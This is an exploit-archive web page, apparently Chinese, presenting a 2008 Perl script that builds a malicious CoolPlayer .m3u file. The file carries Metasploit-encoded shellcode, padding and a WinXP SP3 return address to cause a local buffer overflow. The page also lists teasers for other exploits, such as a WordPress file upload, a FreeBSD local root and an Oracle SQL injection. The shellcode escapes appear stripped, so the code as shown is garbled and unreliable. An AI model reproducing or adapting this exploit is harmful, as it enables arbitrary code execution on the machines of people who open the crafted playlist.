CoolPlayer m3u File Local Buffer Overflow Exploit

所属分类: 网络安全 / Exploit 阅读数: 185
收藏 0 赞 0 分享
#!/usr/bin/perl
# k`sOSe - 07/29/2008 use warnings;
use strict; # http://www.metasploit.com
# EXITFUNC=seh, CMD=c:WINDOWSsystem32calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "xd9xcaxd9x74x24xf4x5exb8xf5x65x2dxfbx31xc9xb1" .
"x24x31x46x19x83xeexfcx03x46x15x17x90xd1x13x93" .
"x5bx2axe4x90x19x16x6fxdaxa4x1ex6excdx2cx91x68" .
"x9ax6cx0ex88x77xdbxc5xbex0cxddx37x8fxd2x47x6b" .
"x74x12x03x73xb4x58xe1x7axf4xb7x0ex47xacx63xeb" .
"xcdxa9xe0xacx09x33x1dx34xd9x3fxaax32x82x23x2d" .
"xaexb6x40xa6x31x22xf1xe4x15xb0xc1x4bx67x4exa5" .
"x25xe3x25x60xf9x60x79x61x72x06x66xd4x0fx8fx9e" .
"xafxf7xd3x5fxc5x57xbcxafx90x53x63x38x3dxa5x11" .
"xb6x6axa6xc1xa4xaex04x59x62x81xf0x2ax23x4exa4" .
"xc7xb2x03x20x4dx28xd7xfaxd1xd1x76x96x8ax3bx1c" .
"x1ex28x44xd4"; print $shellcode .
"x41" x (218 - length($shellcode)) .
"x32x4cx3cx7e" ; # call ebx user32.dll winxp sp3
更多精彩内容其他人还在看

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2> <h3>S
收藏 0 赞 0 分享

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

<?php //////////////////////////////////////////////////////////////////////// // _ _ _
收藏 0 赞 0 分享

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrin
收藏 0 赞 0 分享

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # #
收藏 0 赞 0 分享

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field b
收藏 0 赞 0 分享

MS Internet Explorer Recordset Double Free Memory Exploit

<HTML> <!-- ********************************************************************************** Microsoft Internet Explo
收藏 0 赞 0 分享

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

#!/usr/bin/python # Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability # was discovered by h07 and a POC for wi
收藏 0 赞 0 分享

Linux Kernel

/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw w
收藏 0 赞 0 分享

MS Internet Explorer (FTP Server Response) DoS Exploit

#!/usr/bin/perl # MS 07-016 FTP Server Response PoC # Usage: ./ms07016ftp.pl [LISTEN_IP] # # Tested Against: MSIE 6.0290
收藏 0 赞 0 分享

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

#!/usr/bin/python # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit # Bug discovered by Krystia
收藏 0 赞 0 分享
查看更多